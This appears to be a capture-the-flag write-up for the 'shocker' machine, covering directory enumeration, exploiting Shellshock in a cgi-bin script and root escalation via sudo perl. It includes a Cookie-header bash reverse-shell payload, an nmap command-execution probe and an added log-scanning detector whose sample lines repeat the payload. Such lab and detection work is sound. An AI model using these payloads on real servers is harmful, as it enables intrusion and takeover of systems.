shocker
The Apache header reveals the Ubuntu version, and so does the SSH version.
Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04.
Open the site in a browser and view the page source.
gobuster does not reveal the sensitive directory by default. dirb and dirsearch automatically add a slash for directories in the wordlist, which doubles the number of attempts, so dirb finds it on the first go. To use gobuster, add the -f flag to look for directories, i.e. it simply adds a slash to each wordlist entry.
This reveals a cgi-bin directory.
What is CGI? Let's configure our own CGI on an Apache server: how to enable/disable CGI for Apache, write your own CGI script, configure CGI.
Learning Apache http server - Executing CGI scripts - YouTube
Lecture -19 CGI Scripts - YouTube
Common gateway interface|CGI bin - YouTube
Common Gateway Interface(CGI) || working process of Common Gateway Interface - YouTube
Create first cgi script - YouTube
How To Enable or Disable CGI Scripts in Apache - YouTube
Run a recursive scan inside this directory looking for common CGI scripts.
CGI defines how information/communication takes place between the browser and the server.
It is used for creating pages dynamically.
Shellshock is a bug in bash, in old versions of bash to be precise. Reference: Shellshock Code & the Bash Bug - Computerphile
└─$ gobuster dir -o gobust-cgi.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<TARGET_IP>/cgi-bin/ -x sh,pl,cgi
nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=echo\;/bin/ls <TARGET_IP>
Reverse shell (bash one-liner), sent in the Cookie header:
Cookie: () { :;}; echo; /bin/bash -i >& /dev/tcp/ip/port 0>&1
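Seen from the server side, the header payloads above leave a recognisable `() {` prefix in request headers. The following is an added example, not part of the original notes: a log triage function that flags that prefix in the Referer, User-Agent and Cookie fields. It assumes Apache's combined log format extended with a final quoted `%{Cookie}i` field (the default combined format does not log cookies, so a Cookie-borne payload would otherwise go unrecorded); the function names and all log lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag Shellshock-style header values in Apache access logs.
# Assumed LogFormat: combined + "%{Cookie}i" as a last quoted field.

# Constructed sample log lines (documentation IP ranges, not real traffic).
sample_log() {
cat <<'EOF'
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0" "-"
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 312 "-" "() { :;}; echo; /bin/ls" "-"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "-" "curl/7.88.1" "() { :;}; echo; /bin/bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"
192.0.2.44 - - [01/Jan/2024:10:01:30 +0000] "GET /index.html HTTP/1.1" 200 137 "() { :;}; echo; /bin/ls" "Mozilla/5.0" "-"
EOF
}

# Reads log lines from files given as arguments, or stdin when none.
# Prints one line per suspicious header:
#   <client-ip> <path> <header> <probe|reverse-shell> <cgi|non-cgi> <status>
detect_shellshock() {
  awk -F'"' '
    BEGIN { name[4] = "referer"; name[6] = "user-agent"; name[8] = "cookie" }
    {
      # Splitting on double quotes: $2 request line, $3 status/size,
      # $4 Referer, $6 User-Agent, $8 Cookie.
      split($1, pre, " "); ip = pre[1]
      split($2, req, " "); path = req[2]
      split($3, st, " ");  status = st[1]
      for (i = 4; i <= 8; i += 2) {
        # "() {" opens a bash function definition; no legitimate
        # header value starts an exported function like this.
        if ($i ~ /[(][)][ \t]*[{]/) {
          kind = ($i ~ /\/dev\/tcp\//) ? "reverse-shell" : "probe"
          cgi  = (path ~ /^\/cgi-bin\//) ? "cgi" : "non-cgi"
          printf "%s %s %s %s %s %s\n", ip, path, name[i], kind, cgi, status
        }
      }
    }' "$@"
}

# Stand-alone run over the constructed sample.
sample_log | detect_shellshock
```

Hits on a `cgi` path are the ones to triage first, since only requests that reach a bash-backed CGI handler pass the header into the shell environment.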
Privilege escalation:
sudo /usr/bin/perl -e 'exec("/bin/bash")'